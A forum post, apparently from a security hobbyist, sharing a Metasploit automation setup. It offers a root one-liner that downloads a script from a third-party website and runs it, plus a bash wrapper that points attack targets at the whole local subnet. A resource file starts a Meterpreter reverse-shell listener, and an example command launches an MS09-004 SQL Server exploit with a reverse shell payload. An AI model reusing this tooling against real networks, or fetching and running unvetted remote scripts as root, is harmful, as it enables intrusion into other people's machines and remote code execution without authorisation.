are you tired to do the same things over and over again in msf3, especially setting basic options?
here is what I use for my daily msf3-usage.....
copy&paste the basic shell script below, also the base.msf3 content and just change the paths to reflect your environment!
OR for the lazy ones...
run this in a root terminal:
Code:
mkdir -p /opt/_PRODUCTION/_LOGS/msf3 /opt/_HOMEGR0WN/bin/CONF/ && cd /opt/_HOMEGR0WN/bin && wget -q http://zerohat.de/_shared_files/start_msf3 && cd /opt/_HOMEGR0WN/bin/CONF && wget -q http://zerohat.de/_shared_files/msf3.base && export PATH=$PATH:/opt/_HOMEGR0WN/bin && start_msf3
starting msf3 via a simple bash script, below my start-msf3 script
(it will look for your active network interface and change basic msf3 options in a resource file called msf3.base)
Code:
#!/bin/bash
#
#base vars
#
LOG="/opt/_PRODUCTION/_LOGS/msf3"
ACTIVE_IF=$(netstat -anr |grep UG |awk -F" " '{print $8}')
IF_IP=$(ifconfig $ACTIVE_IF |grep "inet addr" |gawk -F: '{print $2}' |cut -d" " -f1)
IF_MAC=$(macchanger -s $ACTIVE_IF |gawk -F" " '{print $3}')
IP_SUBNET=$(echo $IF_IP |cut -d"." -f1-3)
#
#change necessary vars in the base msf3 resource file
#
sed -i "s/^setg LHOST.*/setg LHOST $IF_IP/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg RHOSTS.*/setg RHOSTS $IP_SUBNET.0\/24/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg SHOST.*/setg SHOST $IF_IP/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg SMAC.*/setg SMAC $IF_MAC/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
sed -i "s/^setg INTERFACE.*/set INTERFACE $ACTIVE_IF/g" /opt/_HOMEGR0WN/bin/CONF/msf3.base
cd /opt/metasploit3/msf3
printf "\n\n"
read -p ">> Should we update msf3 (y/n)? _ " -e update
if [ $update == "y" ]; then
printf "\n...be patient, takes a moment to update..\n"
svn update
fi
./msfconsole -r /opt/_HOMEGR0WN/bin/CONF/msf3.base
Note:SMAC needed for auxiliary scanner/discovery/arp_sweep - if you wanna do an arp sweep
here the content of the /opt/_HOMEGR0WN/bin/CONF/msf3.base file:
(remember, our msf3-startup script will change some of these vars every time you call it)
Code:
db_driver sqlite3
db_destroy /opt/_PRODUCTION/_LOGS/msf3/msf3_base.db
db_create /opt/_PRODUCTION/_LOGS/msf3/msf3_base.db
load db_tracker
setg SessionLogging true
setg ConsoleLogging true
setg LHOST x.x.x.x
setg RHOSTS x.x.x.x/24
setg SHOST x.x.x.x
setg SMAC 00:xx:ca:20:xx:xx
set INTERFACE wlan1
setg THREADS 50
setg LPORT 445
setg OUTPUTPATH /opt/_PRODUCTION/_LOGS/msf3
use multi/handler
exploit -j -z -p windows/meterpreter/reverse_tcp
back
setg
jobs -l
Note: Logs will go into your ~/.msf3/logs directory !
Also you can add your favorite exploit to start with, like:
use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
exploit -j -z -o RHOST=x.x.x.x,DisablePayloadHandler=true -p windows/shell/reverse_tcp
(we also set to disable current payload handler to use a different one for this exploit)
/have fun, brtw2003
basic metasploit automation tasks
Posting Permissions